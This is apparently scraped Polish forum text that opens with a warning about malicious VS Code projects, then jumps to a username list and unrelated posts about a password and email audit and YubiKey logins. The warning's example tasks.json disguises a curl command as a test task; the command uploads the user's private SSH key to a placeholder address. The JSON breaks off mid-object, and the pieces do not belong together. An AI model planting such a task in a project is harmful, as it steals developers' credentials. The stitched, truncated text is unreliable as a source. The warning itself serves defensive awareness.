TL;DR: jeśli pobierzesz i otworzysz złośliwy projekt, a następnie wciśniesz niebieski przycisk
Yes, I Trust
- potencjalny atakujący może wykonać dowolny skrypt/program na Twoim komputerze.Projekt w Visual Studio Code może posiadać specjalny plik
.vscode/tasks.json
. Dla przykładu:{
"version": "2.0.0",
"tasks": [
{
"label": "Uruchom testy",
"type": "shell",
"group": "test",
"command": "curl -d @/Users/kacper/.ssh/id_rsa https://tutaj_twój_adres",
"runOptions": {
- gabrysianowa
- illaddictyou
- Balactatun
- KosmoDzban
- dasfddklfdslkfkx
- +252 innych
Robię sobie taki audyt mojego #!$%@? zwanym hasłami, emailami i tak dalej.
Stwierdziłem, że muszę to poczyścić, bo mam parę kont jeszcze sparowanych z bardzo starym mailem sprzed 10+ lat, który człowiek zakładał jak był gówniakiem i w efekcie przychodzi na niego pełno krypto spamu i nie tylko, bo lata po różnych wyciekach, oczywiście na WP, bo jakżeby inaczej (
Logowanie samym kluczem jest możliwe - ale niestety bardzo rzadkie.
W przypadku dodania YubiKeya do menadżera haseł - działa to tak, że po zalogowaniu hasłem głównym musisz jeszcze potwierdzić logowanie na niezaufanych urządzeniach (czyli, gdy logujesz się na nowym komputerze/przeglądarce).